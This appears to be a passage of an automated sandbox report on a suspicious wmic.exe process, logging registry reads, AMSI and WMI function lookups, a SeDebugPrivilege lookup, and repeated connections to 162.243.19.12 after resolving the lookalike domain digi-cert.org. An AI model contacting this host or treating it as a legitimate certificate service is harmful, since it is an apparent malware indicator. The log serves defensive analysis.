Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = %systemroot%\system32\netfxperf.dll, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 6000, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 value_name = SchUseStrongCrypto, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (64)
»
Operation Module Additional Information Success Count Logfile
Load amsi.dll base_address = 0x7ffbf68c0000 True 1
Fn
Load C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\wminet_utils.dll base_address = 0x7ffbf68f0000 True 1
Fn
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0x7ff66e670000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 1
Fn
Get Handle c:\windows\system32\kernelbase.dll base_address = 0x7ffc14550000 True 1
Fn
Get Filename - process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260 True 3
Fn
Get Address c:\windows\system32\kernel32.dll function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0 True 1
Fn
Get Address c:\windows\system32\amsi.dll function = AmsiInitialize, address_out = 0x7ffbf68c2260 True 1
Fn
Get Address c:\windows\system32\amsi.dll function = AmsiScanString, address_out = 0x7ffbf68c26b0 True 1
Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670 True 1
Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540 True 1
Fn
Get Address Unknown module name function = ResetSecurity, address_out = 0x7ffbf68f20e0 True 1
Fn
Get Address Unknown module name function = SetSecurity, address_out = 0x7ffbf68f21b0 True 1
Fn
Get Address Unknown module name function = BlessIWbemServices, address_out = 0x7ffbf68f2290 True 1
Fn
Get Address Unknown module name function = BlessIWbemServicesObject, address_out = 0x7ffbf68f23b0 True 1
Fn
Get Address Unknown module name function = GetPropertyHandle, address_out = 0x7ffbf68f24d0 True 1
Fn
Get Address Unknown module name function = WritePropertyValue, address_out = 0x7ffbf68f2500 True 1
Fn
Get Address Unknown module name function = Clone, address_out = 0x7ffbf68f2530 True 2
Fn
Get Address Unknown module name function = VerifyClientKey, address_out = 0x7ffbf68f31f0 True 1
Fn
Get Address Unknown module name function = GetQualifierSet, address_out = 0x7ffbf68f2a50 True 1
Fn
Get Address Unknown module name function = Get, address_out = 0x7ffbf68f2700 True 1
Fn
Get Address Unknown module name function = Put, address_out = 0x7ffbf68f26c0 True 1
Fn
Get Address Unknown module name function = Delete, address_out = 0x7ffbf68f2750 True 1
Fn
Get Address Unknown module name function = GetNames, address_out = 0x7ffbf68f2760 True 1
Fn
Get Address Unknown module name function = BeginEnumeration, address_out = 0x7ffbf68f27b0 True 1
Fn
Get Address Unknown module name function = Next, address_out = 0x7ffbf68f27c0 True 1
Fn
Get Address Unknown module name function = EndEnumeration, address_out = 0x7ffbf68f2810 True 1
Fn
Get Address Unknown module name function = GetPropertyQualifierSet, address_out = 0x7ffbf68f2820 True 1
Fn
Get Address Unknown module name function = GetObjectText, address_out = 0x7ffbf68f2840 True 1
Fn
Get Address Unknown module name function = SpawnDerivedClass, address_out = 0x7ffbf68f2860 True 1
Fn
Get Address Unknown module name function = SpawnInstance, address_out = 0x7ffbf68f2880 True 1
Fn
Get Address Unknown module name function = CompareTo, address_out = 0x7ffbf68f28a0 True 1
Fn
Get Address Unknown module name function = GetPropertyOrigin, address_out = 0x7ffbf68f28c0 True 1
Fn
Get Address Unknown module name function = InheritsFrom, address_out = 0x7ffbf68f28e0 True 1
Fn
Get Address Unknown module name function = GetMethod, address_out = 0x7ffbf68f28f0 True 1
Fn
Get Address Unknown module name function = PutMethod, address_out = 0x7ffbf68f2940 True 1
Fn
Get Address Unknown module name function = DeleteMethod, address_out = 0x7ffbf68f2990 True 1
Fn
Get Address Unknown module name function = BeginMethodEnumeration, address_out = 0x7ffbf68f29a0 True 1
Fn
Get Address Unknown module name function = NextMethod, address_out = 0x7ffbf68f29b0 True 1
Fn
Get Address Unknown module name function = EndMethodEnumeration, address_out = 0x7ffbf68f2a00 True 1
Fn
Get Address Unknown module name function = GetMethodQualifierSet, address_out = 0x7ffbf68f2a10 True 1
Fn
Get Address Unknown module name function = GetMethodOrigin, address_out = 0x7ffbf68f2a30 True 1
Fn
Get Address Unknown module name function = QualifierSet_Get, address_out = 0x7ffbf68f2a60 True 1
Fn
Get Address Unknown module name function = QualifierSet_Put, address_out = 0x7ffbf68f2ab0 True 1
Fn
Get Address Unknown module name function = QualifierSet_Delete, address_out = 0x7ffbf68f2ae0 True 1
Fn
Get Address Unknown module name function = QualifierSet_GetNames, address_out = 0x7ffbf68f2af0 True 1
Fn
Get Address Unknown module name function = QualifierSet_BeginEnumeration, address_out = 0x7ffbf68f2b10 True 1
Fn
Get Address Unknown module name function = QualifierSet_Next, address_out = 0x7ffbf68f2b20 True 1
Fn
Get Address Unknown module name function = QualifierSet_EndEnumeration, address_out = 0x7ffbf68f2b70 True 1
Fn
Get Address Unknown module name function = GetCurrentApartmentType, address_out = 0x7ffbf68f2a50 True 1
Fn
Get Address Unknown module name function = GetDemultiplexedStub, address_out = 0x7ffbf68f2060 True 1
Fn
Get Address Unknown module name function = CreateInstanceEnumWmi, address_out = 0x7ffbf68f1760 True 1
Fn
Get Address Unknown module name function = CreateClassEnumWmi, address_out = 0x7ffbf68f18c0 True 1
Fn
Get Address Unknown module name function = ExecQueryWmi, address_out = 0x7ffbf68f1a20 True 1
Fn
Get Address Unknown module name function = ExecNotificationQueryWmi, address_out = 0x7ffbf68f1b90 True 1
Fn
Get Address Unknown module name function = PutInstanceWmi, address_out = 0x7ffbf68f1d00 True 1
Fn
Get Address Unknown module name function = PutClassWmi, address_out = 0x7ffbf68f1e00 True 1
Fn
Get Address Unknown module name function = CloneEnumWbemClassObject, address_out = 0x7ffbf68f1f00 True 1
Fn
Get Address Unknown module name function = ConnectServerWmi, address_out = 0x7ffbf68f34c0 True 1
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Map - process_name = c:\windows\system32\wbem\wmic.exe, desired_access = FILE_MAP_WRITE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (53)
»
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 3
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 3
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 3
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Get Computer Name result_out = X2VS1CUM True 3
Fn
Get Time type = Local Time, time = 2018-06-26 22:59:05 (Local Time) True 1
Fn
Get Time type = Ticks, time = 133156 True 1
Fn
Get Time type = Ticks, time = 140265 True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 7
Fn
Get Info type = Hardware Information True 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Mutex (23)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Release mutex_name = Global\.net clr networking True 1
Fn
Release mutex_name = Global\.net clr networking True 10
Fn
Environment (118)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 112
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\Nd9E1FYi True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\Nd9E1FYi True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Network Behavior
DNS (5)
»
Operation Additional Information Success Count Logfile
Resolve Name host = digi-cert.org, address_out = 162.243.19.12 True 5
Fn
TCP Sessions (18)
»
Information Value
Total Data Sent 6.19 KB
Total Data Received 30.38 KB
Contacted Host Count 1
Contacted Hosts 162.243.19.12:443
TCP Session #1
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 680 bytes
Data Received 3.68 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 61, size_out = 61 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1575, size_out = 1575 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 331, size_out = 331 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4, size_out = 4 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 134, size_out = 134 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 218, size_out = 218 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 213, size_out = 213 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #4
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #5
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #6
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #7
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #8
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.60 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
